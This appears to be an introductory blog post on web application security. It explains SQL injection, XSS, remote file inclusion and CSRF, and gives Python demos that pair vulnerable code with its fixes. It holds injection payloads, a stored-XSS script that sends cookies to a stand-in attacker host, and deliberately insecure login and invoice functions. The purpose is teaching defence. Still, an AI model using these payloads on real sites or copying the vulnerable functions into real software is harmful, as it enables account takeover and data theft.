Hi all!
Another new security topic: web application security. What is it?
Here I will explore one of the major areas of the security industry. Before moving on to the content, let me ask you something: imagine what you would do if there were no websites in this world.
Most of you will think, how is that possible? Without websites there would be little use for the internet. We all know that. So the next question is: have you ever thought about the security issues on those sites?
Most of us think that if the page shows a security certificate next to the URL, that is enough. It is not.
The padlock only tells you that the connection to the site is encrypted; the application behind it can still be full of problems. Many of us then ask: even if it has problems, how does that affect me, and why should I care?
The answer to both questions is simple: awareness of these problems is what stops you from being the one who gets hacked. So, no more discussion, let's dig into the topic.
Web application security is the process of protecting websites and online services against different security threats that exploit vulnerabilities in an application’s code. Common targets for web application attacks are content management systems (e.g., WordPress), database administration tools (e.g., phpMyAdmin) and SaaS applications.
Many web application vulnerabilities are the result of missing input validation and output encoding. Attackers exploit them to change what the application's queries, scripts or file operations actually do, or to gain unauthorized access.
Such vulnerabilities enable the use of different attack vectors, including:
SQL Injection – Occurs when attacker-controlled input is concatenated into a database query, so that the attacker's text is executed as SQL by the backend database. Consequences include unauthorized viewing of data (for example user lists or password hashes), deletion of tables and unauthorized administrative access.
Cross-site Scripting (XSS) – XSS is an injection attack targeting users: attacker-supplied script runs in the victim's browser in the context of the site, which can be used to steal session cookies and take over accounts, deliver malware or modify page content. Stored XSS occurs when the malicious script is saved in the application (a comment, a profile field) and served to every visitor. Reflected XSS takes place when script in the request, typically a URL parameter, is echoed back by the application into the page of the user who clicked the link.
Remote File Inclusion – The attacker supplies the URL of a file they control to a parameter the application passes to an include or require call, so the server fetches and executes it. This results in execution of malicious code within the application, as well as data theft or manipulation.
Cross-site Request Forgery (CSRF) – An attack that could result in an unsolicited transfer of funds, changed passwords or email addresses, and with them account takeover. It happens when a malicious site makes the user's browser send a request to a site the user is logged on to; because the browser attaches the session cookie automatically, the target site treats the forged request as the user's own.
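As an added example, not part of the original post, here is the SQL injection case from the list above in runnable Python against an in-memory SQLite table. The users, table layout, function names and the two payloads are my own constructions for the demo. The vulnerable login builds its query by string formatting; the fixed version uses a parameterized query, so the same payloads come back empty.

```python
import sqlite3

# Constructed sample users for this demo (not data from the original post).
# Plaintext passwords are used only to keep the example short; real applications store hashes.
USERS = [
    ("alice", "s3cret-alice", 0),
    ("bob", "s3cret-bob", 0),
    ("admin", "s3cret-admin", 1),
]


def make_db():
    """Create an in-memory SQLite database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, name, password):
    """Builds the query by string formatting: user input becomes part of the SQL text."""
    sql = (f"SELECT name, is_admin FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, name, password):
    """Same lookup, but the values are bound by the driver and can never change the SQL."""
    sql = "SELECT name, is_admin FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


def demo():
    """Run a legitimate login and two classic payloads against both versions."""
    conn = make_db()
    # Payload 1: closes the string literal and appends an always-true condition.
    always_true = "' OR '1'='1"
    # Payload 2: closes the string literal and comments out the rest of the WHERE clause.
    admin_bypass = "admin'--"
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "s3cret-alice"),
        "legit_param": login_parameterized(conn, "alice", "s3cret-alice"),
        # ... WHERE name = 'x' AND password = '' OR '1'='1'   -> every row comes back
        "dump_vulnerable": login_vulnerable(conn, "x", always_true),
        "dump_param": login_parameterized(conn, "x", always_true),
        # ... WHERE name = 'admin'--' AND password = 'wrong'  -> password check is a comment
        "bypass_vulnerable": login_vulnerable(conn, admin_bypass, "wrong"),
        "bypass_param": login_parameterized(conn, admin_bypass, "wrong"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:18} -> {rows}")
```

The first payload turns the login into a full table dump; the second logs the attacker in as admin without a password. Both fail against the parameterized query because the driver sends the values separately from the SQL, so a quote in the input is just a quote in the data.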
In theory, thorough input validation and context-aware output encoding eliminate the whole injection class (SQL injection, XSS, file inclusion). They do nothing for CSRF, broken access control or business-logic flaws, which is why the checklist below has to go beyond sanitization.
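As an added example, not code from the original post, here is what output encoding for the XSS case looks like in Python, plus the caveat that encoding is context dependent: HTML-escaping a URL does not stop a javascript: link inside an href attribute, so that context needs a scheme check as well. The template, the comment payload and the function names are my own constructions.

```python
import html
from urllib.parse import urlparse

# Constructed page fragment (not from the original post). A real application would use a
# templating engine with auto-escaping; this shows what that engine has to do for you.
TEMPLATE = "<p>Comment from {user}:</p><div>{comment}</div>"

# Constructed stored-XSS payload: exfiltrates the session cookie of anyone who views the page.
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def render_unsafe(user, comment):
    """Stored XSS sink: the saved comment is inserted into the page verbatim."""
    return TEMPLATE.format(user=user, comment=comment)


def render_escaped(user, comment):
    """HTML-body context: escape &, <, >, double and single quotes so data never becomes markup."""
    return TEMPLATE.format(user=html.escape(user), comment=html.escape(comment))


def safe_href(url):
    """Attribute context: escaping alone does not neutralise javascript: URLs in an href,
    so allow only http(s) schemes first, then escape for the attribute."""
    if urlparse(url).scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_profile_link(url):
    """Renders a user-supplied profile URL inside an attribute."""
    return f'<a href="{safe_href(url)}">profile</a>'


if __name__ == "__main__":
    print(render_unsafe("mallory", PAYLOAD))
    print(render_escaped("mallory", PAYLOAD))
    print(render_profile_link("javascript:alert(document.cookie)"))
    print(render_profile_link("https://example.com/?a=1&b=2"))
```

The escaped comment still displays the attacker's text, but as text: the browser sees &lt;script&gt; and never executes anything. For the link, the scheme allowlist is the part that matters; html.escape on "javascript:alert(1)" would leave it a working link.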
The following processes should be part of any web application security checklist:
Information gathering – Manually review the application, identifying entry points and client-side code. Classify third-party hosted content.
Authorization – Test the application for path traversal; vertical and horizontal access control issues; missing authorization and insecure direct object references.
Cryptography – Secure all data in transit. Is sensitive data encrypted at rest? Are weak algorithms in use? Are session IDs and tokens generated from a cryptographically secure random source?
Denial of service – Improve an application’s resilience against denial of service threats by testing for anti-automation, account lockout, HTTP protocol DoS and SQL wildcard DoS. This doesn’t cover protection from high-volume DoS and DDoS attacks, which are best countered by a combination of filtering solutions and scalable resources.
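As an added example for the authorization item of the checklist, not code from the original post, here is an insecure direct object reference beside its fixed form, together with the enumeration an attacker would run against it. The invoice store, the users and all function names are my own constructions. Two details a tester looks for are shown: horizontal control (a user can read only their own records) and vertical control (only admins can delete), and the fixed lookup answers "not found" for both missing and foreign ids so it does not reveal which ids exist.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    is_admin: bool = False


class NotFound(Exception):
    """Raised for both missing and foreign invoices so the API does not leak which ids exist."""


class Forbidden(Exception):
    """Raised when the caller lacks the role the operation requires."""


# Constructed invoice store (not from the original post): invoice id -> (owner, amount).
INVOICES = {
    1001: ("alice", 120.00),
    1002: ("bob", 80.50),
    1003: ("alice", 42.00),
}


def get_invoice_insecure(user, invoice_id):
    """IDOR: trusts the id from the request and never checks who owns the record."""
    row = INVOICES.get(invoice_id)
    if row is None:
        raise NotFound(invoice_id)
    return row


def get_invoice(user, invoice_id):
    """Horizontal access control: a user sees only their own invoices; admins see all."""
    row = INVOICES.get(invoice_id)
    if row is None or (row[0] != user.name and not user.is_admin):
        raise NotFound(invoice_id)
    return row


def delete_invoice(user, invoice_id, store):
    """Vertical access control: deletion is an admin-only operation."""
    if not user.is_admin:
        raise Forbidden(user.name)
    if invoice_id not in store:
        raise NotFound(invoice_id)
    del store[invoice_id]


def enumerate_ids(fetch, user, id_range):
    """What an attacker does: walk a range of ids and keep whatever the endpoint returns."""
    found = {}
    for invoice_id in id_range:
        try:
            found[invoice_id] = fetch(user, invoice_id)
        except NotFound:
            continue
    return found


if __name__ == "__main__":
    bob = User("bob")
    print("insecure, as bob:", enumerate_ids(get_invoice_insecure, bob, range(1000, 1010)))
    print("fixed, as bob:   ", enumerate_ids(get_invoice, bob, range(1000, 1010)))
```

Sequential numeric ids make the enumeration trivial, but random ids are not a fix on their own: the ownership check in get_invoice is what closes the hole, and it has to be applied on every endpoint that takes an object id, not only on the one the tester happened to try.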